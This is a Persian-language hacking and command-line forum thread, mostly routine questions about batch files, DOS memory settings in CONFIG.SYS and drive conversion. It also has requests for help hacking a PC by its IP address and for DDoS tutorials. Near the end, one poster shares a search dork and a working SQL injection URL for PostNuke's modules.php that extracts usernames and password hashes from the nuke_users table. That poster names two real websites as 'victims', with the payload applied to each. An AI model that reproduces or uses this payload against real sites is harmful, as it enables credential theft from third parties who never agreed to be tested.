دمت گرم عزیز کار مارو راه انداختی :40::46:نقل قول:
Printable View
دمت گرم عزیز کار مارو راه انداختی :40::46:نقل قول:
مجددا یک سوال
چجوری میشه کاری کرد که یک فایل bat بعد از انجام کارهاش پاک شه
تایپیک جالب و خوبیه ایشالا سرعتر بشه آموزش
با تشکر سینا
با دستور del بهش دستور مي دي خودشو پاك كنه!نقل قول:
مجددا یک سوال
چجوری میشه کاری کرد که یک فایل bat بعد از انجام کارهاش پاک شه
مثلا اين محتويات يه فایل bat بنام del.bat هستش كه خودشو پاك مي كنه:
همين!کد:@echo off
del del.bat
آقا كرم بلستر كارنميكنه ...نقل قول:
لطفا تصحيح كنيد...
سلام
من وقتی میخواستم یه فایل exe رو edit کنم این ارور رو میداد:
Out of far memory
... ؟
virtual memory رو زياد كن ولي اگه بازم نشد و رم 512 به بالا داري:
System.ini رو باز كن توي Notepad
توي قسمت [VCache] اين تغييرات رو بده:
کد:[VCache]
MinFileCache=51200
MaxFileCache=56320
بعداً به حالت قبل در بیارمش؟ همینطوری باشه مشکلی ایجاد نمیشه؟
رم 1 گیگ هست
نه مسئله اي نداره
سلام دوست عزیزنقل قول:
گفتم کسی جوابتو نداده هنوز تو کفی به سر میبری :31:، گفتم یه کار خیر انجام بدم:10:
فارزها برنامه هایی برای کشف ایرادات امنیتی و این برنامه ها با فرستادن اطلاعات تصادفی به برنامه ها این کارو می کنند. آقا یه کلام اگر برنامه ها یه ایراد امنیتی داشت می تونند این ایرادات رو به ما نشون بدن .
فارزها یا Full Injectors هم نام دارند چون این برنامه ها اساس کارشون بر اینه که با فرستادن یه اشتباه و ایراد یه برنامه و نشان دادن عکس العملش اون رو به ما نشون میده. این برنامه برای پیدا کردن حفرات زیر به کار می رود
BufferOverflow.1
DoS.2
SQL Injection.3
Xss.4
Format String Bugs.
برو حالشو ببر:11:
راستی آقا ما هم هستیم ولی 1 هفته دیگه از مسافرت میام اونوقت برید حالشو ببرید:8::11:
هر کاری کردم هر موقعی بازش کردم vcach رو پیدا نکردم...نقل قول:
System.ini رو باز كن توي Notepad
توي قسمت [VCache] اين تغييرات رو بده:
؟؟؟
دیگه اینقدر هم ... نیستم که سه ماه تو کف باشم منتظر یه نفر...نقل قول:
گفتم کسی جوابتو نداده هنوز تو کفی به سر میبری ، گفتم یه کار خیر انجام بدم
ولی ممنون
CONFIG.SYS رو با notepad باز كننقل قول:
هر کاری کردم هر موقعی بازش کردم vcach رو پیدا نکردم...
اگه خطي داري كه با DOS= شروع مي شه ويرايشش كن و اگه همچين خطي نداري اين خط رو اضافه كن:
مطمئن شو اين دو خط هم وجود دارن:کد:DOS=HIGH,UMB
اين خطا يه جورايي خيلي قديميه معلوم نيست داري چيكار مي كني كه اين گيرت اومده!!!کد:DEVICE=C:\WINDOWS\HIMEM.SYS
DEVICE=C:\WINDOWS\EMM386.EXE NOEMS
سلام به همگي آقا من خيلي شرمندم كه اين سوال آماتوري را دراين بخش ازدوستان واساتيد مي پرسم چون هيچي از برنامه نويسي نمي دانم وتازه بايد برم كلاس وسركتابها.1.آيا براي برنامه نويسي مثل زبان (پيتون--جاوا--html--lisp--c--exploiting--perl) وكدنويسي والگوريتم و ساير زبان ها كجا بايد برنامه نويسي كرد آيا هركدام براي خود برنامه اي جدا گانه دارند ودرچه سيستم عاملي مي توان به راحتي كاركرد (XP--DOS--LINUX-98SE--VISTA) آيا درتمام اين سيستم عامل ها جواب مي دهد ؟مي دونم گذاشتن اين سوال اينجا نيست ولي اگرجواب دهيد خيلي ممنون مي شوم.
ای بابا....!
رفتیم یه مشکل رو حل کنیم 2تا دیگه اضافه شد...!
فایل Config.sys من غیب شده! البته تو محیط گرافیکی... تو محیط متنی هست ولی حجمش صفره! یکی تو C:\ یکی هم پوشه ی ویندوز(!)
البته قدیما این فایل بود...
حالا چیکار کنم؟!!
سلامنقل قول:
سلام به همگي آقا من خيلي شرمندم كه اين سوال آماتوري را دراين بخش ازدوستان واساتيد مي پرسم چون هيچي از برنامه نويسي نمي دانم وتازه بايد برم كلاس وسركتابها.1.آيا براي برنامه نويسي مثل زبان (پيتون--جاوا--html--lisp--c--exploiting--perl) وكدنويسي والگوريتم و ساير زبان ها كجا بايد برنامه نويسي كرد آيا هركدام براي خود برنامه اي جدا گانه دارند ودرچه سيستم عاملي مي توان به راحتي كاركرد (XP--DOS--LINUX-98SE--VISTA) آيا درتمام اين سيستم عامل ها جواب مي دهد ؟مي دونم گذاشتن اين سوال اينجا نيست ولي اگرجواب دهيد خيلي ممنون مي شوم.
راستش این تاپیک اینقدر متاسفانه بی در و پیکر شده که همه رقم سوال میشه توش پرسید!!
اینجا همش دو سه تا استاد داریم... راحت باش همه آماتوریم...
میگم همه رو میخوای با هم یاد بگیری؟!!!!
خب آره دیگه... هر زبونی کامپایلر خودشو داره... البته میشه یه حرکتهایی هم زد مثلاً تو C++ از اسمبلی استفاده کنی و... که البته قضیه ش یه چیز دیگه ست و ربطی به سوال شما نداره...
درجواب سوال بعدی هم تقریباً میشه گفت مطمئناً لینوکس! دی: البته جواب دادنو که تو همه جواب میده...
خودتو ناراحت نكن!نقل قول:
اين فايلها تا زمان بوت خالي هستن بعد اطلاعات واردشون مي شه
تو مي توني config.nt رو اديت كني كه توي فولدر system32 هستش
ببین من الان از یکی دیگه پرسیدم گفت ارورش به خاطر ناتوانی خط فرمان هست
برای ادیت کردن فایلهای بالای 5.3 مگ
آره؟
(حجم فایلم زیاده)
درسته! پس فكر كردي من چهار ساعته دارم چيكار مي كنم!!! مي خوام حافظه اش افزايش پيدا كنه!
حافظه داس محدوده حتي اگه رم بالا داشته باشي
اون خطي كه به config.sys اضافه مي كنيم براي همينه كه اين حافظه افزايش پيدا كنه
بازم درست نشد؟ پس ديگه فكر نكنم كاري بشه كرد جز اينكه يه جور ديگه اون فايلو اديت كني
نزدیک بود کیبورد خورد بشه... دیگه اعصاب ندارم...
همون ارور رو باز میده
config.nt اون دوتا خط رو نداشت اینو داشت:
dos=high, umb
device=%SystemRoot%\system32\himem.sys
files=40
اون دوتا خط رو اضافه کردم (بعداز خط دوم)بعد ریبوت کردم ولی بازم همون ارور رو داد (گریه)
خب پس از خر شيطون پياده شو اون فايلو يه جاي ديگه اديت كن! چون من ديگه چيزي به ذهنم نمي رسه
شايد اين فايل تو زيادي بزرگه! مگه حجمش چقدره؟
آخه من یه کار دیگه دارم باهاش... برای ادیت که خوب نرم افزار هست...نقل قول:
خب پس از خر شيطون پياده شو اون فايلو يه جاي ديگه اديت كن! چون من ديگه چيزي به ذهنم نمي رسه
شايد اين فايل تو زيادي بزرگه! مگه حجمش چقدره؟
حجمش هم هفت مگابایت خورده ای هست
در هر صورت ممنون
دمت گرم این مطالبو گفتی
سلام
درایو Fat32 رو چطوری با خط فرمان Ntfs کنم؟؟
اگه مثلا درايو D رو بخواي Ntfs كني:نقل قول:
کد:convert D: /fs:ntfs
آقا یه چیز ما هم بگیم نمی خوام تبلیغ کنم ولی انصافا مثل اینکه داخل این سایت در مورد هک خبرایی هست یه نگاه بندازید!!!!!
چون اولش هست حال میده ،
خودم دارم پیگیر می کنم تازه شروع کردن فکر کنم چیز باهالی بشه...کد:http://-------------/forum/showthread.php?p=3112&posted=1#post3112
:18::18:نقل قول:
دلتو به این خوش کردی؟این مطلب تا به حال هزار جا کپی پیست شده
مطلبشم ماله 30 ساله پیشه
سلام
یه دایرکتوری دارم که توش یه تعدادی دایرکتوری هست تو هر کدوم یکی یا دوتا فایل هست من میخوام همه این فایل هایی که توی این ساب دایرکتوری ها هست رو تویه پوشه ی دیگه بریزم یا کپی کنم
چطوری اینکارو بکنم؟ با cammandprompt که هیچ رقمه نشد با پوسته فرمان لینوکس میشه؟
من با لينوكس زياد كار نمي كنم فرمانهاي خيلي ساده شو بلدم بهتره توي بخش لينوكس بپرسي
درمورد cammandprompt بايد فكر كنم ببينم مي شه كلكي سوار كرد يا نه!
سلام
کسی میتونه بگه که از چه دستوری استفاده کنم تا به محض ورود به درایوی که فایل بت اونجاست اون فایل خود به خود اجرا بشه؟
تاپیک جالبی باید باشه ! تا حالا ندیده بودم!
سلام
مثل اینکه قراره اینجا هم مثل تون تاپیک رجیستری به ....کشیده بشه
چرا هیچ کس نمی یاد یک مطلب خوب بده........
به هر حال
ببینم
کسی بلده تو ویژوال بیسیک یک چیزی بنویسه که به برنامه بفهمونه که اسم فولدر هارو کپی بگیره و به اسم اونا یک فایل بسازه
اگه کسی تا حالا ویروس trojan.win32.delf.aam منظورم دقیقا کاری که این ویروس انجام میده
لطفا به این تاپیک یک سر و سامانی بدید
قرار بود اموزش هک باشه نه comon prompet
majeed ar@m
یبا با کجایید
سلام خواستم بپرسم چی جوری میتونم در یه فروم بدون اینکه ثبت نام کنم لینکهای دانلودشو مشاهده کنم خیلی ممنون . آیا سایتی و جود داره که از طریق اون بشه وارد فروم مزبور شد و لینکها رو مشاهده کرد ممنون از همتون.
سلام
دوستان عزیز من بیشتر کارم رو با e-mail انجام میدم و با افراد زیادی سر و کار دارم از طریق میل یا مسنجر ( منظورم چت روم و .... نسیت )
واسم مهمه کاری کنم که تا جای ممکن افرادی که قصد هک و ویروس فرستادن رو دارن موفق نشن .
1. در مورد امنیت اینترنت راهنمایی می خواستم و پیشنهاد نرم افزار
2. در مورد مقابله با ویروس های اینترنتی راهنمایی می خواستم و پیشنهاد نرم افزار
این موضوع ها خیلی واسم مهمه اگه مفصل راهنمایی کنین ممنون میشم .
1دنیا مرسی
تو مي توني از googlebot استفاده كني و با تعريف يه يوزر كه توي فايرفاكس و ie7 امكان پذيره بدون رجيستر شدن از لينكها استفاده كني ولي من خودم تا حالا ازش استفاده نكردم
دوستان گرامی لطفا به عنوان تاپیک دقت بفرمایید !
پست های اضافی پاک خواهند شد.
سلام
من ميخواستم بدونم اگه آي پي يكي رو داشته باشيم (pc) چجوري ميتونيم هكش كنيم؟
اگه ممنكنه و خسته نميشيد به صورت پيام خصوصي برام بفرستيد ولي اگه نميخايد همينجا بذاريد.
اگه با در آوردن Ip میشد هک کرد که الان هر ... ی هکر بود!!
یکم مطالب پایه ای رو بخون(میتونی از صفحه اول همین تاپیک شروع کنی:31: )
آموزش Ddos تو تاپيك هست؟!
يا حق (:
[PHP]Dork:
inurl:"/modules.php?op=modload"
Expl0it :
http://site.com/modules.php?op=modload&name=News&file=article&sid=-1%20UNION%20all%20SELECT%201,2,3,4,5,6,7,8,9,10,11 ,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,1 9,20,21%20FROM%20nuke_users/*[/PHP]
يا حق (:
[PHP]exploit:
http://site.com/modules.php?op=modload&name=News&file=article&sid=-1%20UNION%20all%20SELECT%201,2,3,4,5,6,7,8,9,10,11 ,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,1 9,20,21%20FROM%20nuke_users/*
--------------------------------
Victem : http://www.enricomoriconi.it/html/modules.php?op=modload&name=News&file=article&sid=-1%20UNION%20all%20SELECT%201,2,3,4,5,6,7,8,9,10,11 ,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,1 9,20,21%20FROM%20nuke_users/*
http://www.darkhardware.com/modules.php?op=modload&name=News&file=article&sid=-1%20UNION%20all%20SELECT%201,2,3,4,5,6,7,8,9,10,11 ,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,1 9,20,21%20FROM%20nuke_users/*
[/PHP]